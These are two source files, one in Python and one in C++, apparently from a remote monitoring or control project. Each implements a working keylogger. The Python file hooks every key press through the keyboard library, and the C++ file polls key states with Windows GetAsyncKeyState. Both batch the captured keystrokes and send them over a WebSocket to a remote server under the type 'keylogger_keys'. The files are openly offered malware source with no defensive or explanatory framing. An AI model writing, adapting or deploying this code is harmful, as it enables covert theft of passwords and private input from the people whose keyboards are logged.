File: argus/prototype/keylogger.py
import time
import threading
import keyboard
import json

class KeyLogger:
    def __init__(self):
        self.running = False
        self.keystrokes = []
        self.keylog_thread = None
        self.send_thread = None
        self.SPECIAL_KEYS = {
            'space': '<space>',
            'tab': '<tab>',
            'enter': '<enter>',
            'alt': '<alt>',
            'alt gr': '<altgr>',
            'shift': '<shift>',
            'ctrl': '<ctrl>',
            'backspace': '<backspace>',
            'caps lock': '<capslock>',
            'delete': '<delete>',
            'esc': '<esc>',
            'up': '<up>',
            'down': '<down>',
            'left': '<left>',
            'right': '<right>',
        }

    def log_keystrokes(self):
        def on_key_event(event):
            if self.running and event.event_type == keyboard.KEY_DOWN:
                key_name = event.name
                key_data = self.SPECIAL_KEYS.get(key_name.lower(), key_name)
                self.keystrokes.append(key_data)
                print(f"[Keystroke] Logged: {key_data}")

        keyboard.hook(on_key_event)

    def send_keystrokes(self, ws_holder):
        while self.running:
            time.sleep(0.1)
            if self.keystrokes and ws_holder.ws and ws_holder.ws.sock and ws_holder.ws.sock.connected:
                try:
                    payload = {
                        "type": "keylogger_keys",
                        "data": "".join(self.keystrokes.copy())
                    }
                    ws_holder.ws.send(json.dumps(payload))
                    self.keystrokes.clear()
                    print("[Keystrokes] Sent keystrokes to server")
                except Exception as e:
                    print(f"[Keystrokes Error] Failed to send keystrokes: {e}")
            elif not ws_holder.ws:
                print("[Keystrokes] Waiting for WebSocket connection...")

    def start_keylogger(self, ws_holder):
        if not self.running:
            self.running = True
            self.keylog_thread = threading.Thread(target=self.log_keystrokes, daemon=True)
            self.send_thread = threading.Thread(target=self.send_keystrokes, args=(ws_holder,), daemon=True)
            self.keylog_thread.start()
            self.send_thread.start()
            print("[Keylogger] Started")

    def stop_keylogger(self):
        if self.running:
            self.running = False
            keyboard.unhook_all()
            self.keystrokes.clear()
            self.keylog_thread = None
            self.send_thread = None
            print("[Keylogger] Stopped")

key_logger = KeyLogger()

def start_keylogger(ws_holder):
    key_logger.start_keylogger(ws_holder)

def stop_keylogger():
    key_logger.stop_keylogger()

File: seeker/src/keylogger.cpp
#include "keylogger.hpp"
#include <windows.h>
#include <thread>
#include <atomic>
#include <vector>
#include <mutex>
#include <string>
#include <map>
#include <numeric>
#include <iostream>

const std::map<int, std::string> KeyLogger::special_keys = {
    {VK_SPACE, "<space>"},
    {VK_TAB, "<tab>"},
    {VK_RETURN, "<enter>"},
    {VK_MENU, "<alt>"},
    {VK_CONTROL, "<ctrl>"},
    {VK_SHIFT, "<shift>"},
    {VK_BACK, "<backspace>"},
    {VK_CAPITAL, "<capslock>"},
    {VK_DELETE, "<delete>"},
    {VK_ESCAPE, "<esc>"},
    {VK_UP, "<up>"},
    {VK_DOWN, "<down>"},
    {VK_LEFT, "<left>"},
    {VK_RIGHT, "<right>"}
};

void KeyLogger::log_keystrokes() {
    std::map<int, bool> key_state;
    while (running) {
        for (int key = 8; key <= 255; key++) {
            if (GetAsyncKeyState(key) & 0x8000) {
                if (!key_state[key]) {
                    key_state[key] = true;
                    std::string key_data;
                    if (special_keys.count(key)) {
                        key_data = special_keys.at(key);
                    }
                    else if (key >= 0x30 && key <= 0x39 || key >= 0x41 && key <= 0x5A) {
                        bool is_shift = GetAsyncKeyState(VK_SHIFT) & 0x8000;
                        char c = (char)key;
                        if (is_shift && key >= 0x41 && key <= 0x5A) {
                            key_data = std::string(1, c);
                        }
                        else if (!is_shift && key >= 0x41 && key <= 0x5A) {
                            key_data = std::string(1, tolower(c));
                        }
                        else {
                            key_data = std::string(1, c);
                        }
                    }
                    else {
                        continue;
                    }

                    {
                        std::lock_guard<std::mutex> lock(keystrokes_mutex);
                        keystrokes.push_back(key_data);
                        std::cout << "[Keystroke] Logged: " << key_data << std::endl;
                    }
                }
            }
            else {
                key_state[key] = false;
            }
        }
        std::this_thread::sleep_for(std::chrono::milliseconds(10));
    }
}

void KeyLogger::send_keystrokes() {
    while (running) {
        std::this_thread::sleep_for(std::chrono::milliseconds(100));
        std::vector<std::string> to_send;
        {
            std::lock_guard<std::mutex> lock(keystrokes_mutex);
            if (!keystrokes.empty()) {
                to_send = keystrokes;
                keystrokes.clear();
            }
        }
        if (!to_send.empty()) {
            try {
                std::string combined = std::accumulate(to_send.begin(), to_send.end(), std::string(),
                    [](const std::string& a, const std::string& b) { return a + b; });

                nlohmann::json payload;
                payload["type"] = "keylogger_keys";
                payload["data"] = combined;
                client.sendMessage(payload.dump());
                std::cout << "[Keystrokes] Sent keystrokes to server" << std::endl;
            }
            catch (const std::exception& e) {
                std::cerr << "[Keystrokes Error] Failed to send keystrokes: " << e.what() << std::endl;
            }
        }
    }
}

KeyLogger::KeyLogger(WebSocketClient& ws_client) : client(ws_client) {}

KeyLogger::~KeyLogger() {
    stop();
}

void KeyLogger::start() {
    if (!running) {
        running = true;
        keylog_thread = std::thread(&KeyLogger::log_keystrokes, this);
        send_thread = std::thread(&KeyLogger::send_keystrokes, this);
        std::cout << "[Keylogger] Started" << std::endl;
    }
}

void KeyLogger::stop() {
    if (running) {
        running = false;
        if (keylog_thread.joinable()) keylog_thread.join();
        if (send_thread.joinable()) send_thread.join();
        {
            std::lock_guard<std::mutex> lock(keystrokes_mutex);
            keystrokes.clear();
        }
        std::cout << "[Keylogger] Stopped" << std::endl;
    }
}